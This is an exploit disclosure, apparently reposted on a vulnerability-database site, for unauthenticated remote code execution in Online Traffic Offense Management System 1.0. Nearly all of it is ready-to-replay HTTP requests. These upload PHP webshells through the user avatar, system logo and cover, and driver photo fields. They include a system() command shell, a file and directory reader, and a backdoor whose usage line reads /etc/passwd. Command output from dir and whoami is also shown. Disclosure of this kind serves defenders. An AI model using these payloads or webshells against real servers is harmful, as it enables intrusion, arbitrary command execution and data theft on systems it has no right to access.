Saturday, October 23, 2021

Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)

# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### RCE - Remote Code Execution

# All requests can be sent by both an authenticated and a non-authenticated user

# RCE - we can exploit the RCE vulnerability in several ways:

* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
  
* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
  
* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user

* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user

* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1

# Request send as Unauthenticated user

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"


-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
</pre>
</BODY></HTML>



-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# The file was uploaded to the uploads directory
# Request to list files in uploads\

GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /traffic_offense/uploads</title>
 </head>
 <body>
<h1>Index of /traffic_offense/uploads</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a>  </td><td align="right">2021-08-19 09:24  </td><td align="right"> 11K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58  </td><td align="right">5.2K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a>     </td><td align="right">2021-10-07 07:31  </td><td align="right">3.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a>     </td>
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to webshell

GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
 Volume in drive C has no label.
 Volume Serial Number is 283C-C6A0

 Directory of C:\xampp\htdocs\traffic_offense\uploads

07.10.2021  10:09    <DIR>          .
07.10.2021  10:09    <DIR>          ..
19.08.2021  09:24            11ÿ426 1629336240_avatar.jpg
20.08.2021  08:58             5ÿ288 1629421080_tl-logo.png
07.10.2021  07:31             3ÿ451 1633584660_xss.svg
07.10.2021  09:59               252 1633593540_cmd.php
07.10.2021  10:02               252 1633593720_cmd.php
07.10.2021  09:02    <DIR>          drivers
               5 File(s)         20ÿ669 bytes
               3 Dir(s)  86ÿ494ÿ085ÿ120 bytes free
</pre>
</BODY></HTML>

-----------------------------------------------------------------------------------------------------------------------

## Example 2

# Webshell as System Logo and next webshell as Potal Cover in System Information page

# Request

POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"

Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"

OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"

<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
</pre>
</BODY></HTML>



-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream

<?php

if($_GET['file']) {
	$fichero=$_GET['file']; 
	} else {
	$fichero="/";
	} 

if($handle = @opendir($fichero)) {
  while($filename = readdir($handle)) {
    echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
    }
  closedir($handle);
  } else {
  echo "FILE: " . $fichero . "<br><hr><pre>";
  $fp = fopen($fichero, "r");
  $buffer = fread($fp, filesize($fichero));
  echo $buffer;
  fclose($fp);
  }

?>
-----------------------------339921602532596419562348365833--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------

# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php

## Example 3

# Webshell as photo in driver list page

# Request

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"

vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"

vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"

vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"

vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"

2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"

vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"

vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"

Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"

vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"

vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"

Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

-----------------------------12210274961293066124133837204--

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------

# Request to webshell

GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<pre>desktop-uhrf0c6\hubert
</pre>
            
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore